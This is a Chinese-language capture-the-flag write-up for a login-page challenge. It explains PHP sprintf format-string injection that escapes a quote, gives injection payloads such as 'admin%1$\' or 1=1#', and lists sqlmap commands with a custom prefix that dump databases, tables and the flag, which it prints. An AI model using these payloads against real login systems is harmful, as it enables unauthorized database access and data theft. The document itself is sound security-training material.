打开连接,出现一个登录框:
尝试:扫目录、弱口令、源代码都没有什么发现
题目为sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。
尝试手工测一下,发现在用户名处输入%时居然有报错!
看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。
sprintf注入,或者说php格式化字符串注入的原理为:
要明白%后的一个字符(除了%,%上面表格已经给出了)都会被当作字符型类型而被吃掉,也就是被当作一个类型进行匹配后面的变量,比如%c匹配ascii码,%d匹配整数,如果不在定义的也会匹配,匹配空,比如%\,这样我们的目的只有一个,使得单引号逃逸,也就是能够起到闭合的作用。
构造payload:
username=admin%1$\' or 1=1#
username=admin%1$\' or 1=2#
若第一个提示password error,第二个提示username error则说明此处存在注入。
添加sqlmap添加前缀的参数:–prefix="%1$’"继续跑
sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username
爆数据库
sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username --dbs
爆表
sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username --tables -D"ctf"
爆字段
sqlmap -r'/root/Desktop/222/dsaf.txt' --prefix="%1$\'" -p username --columns -T"flag" -D"ctf" --dump
flag{b5b36121-86dd-a4db-aab3-86ddb749dfa1}成功拿到flag~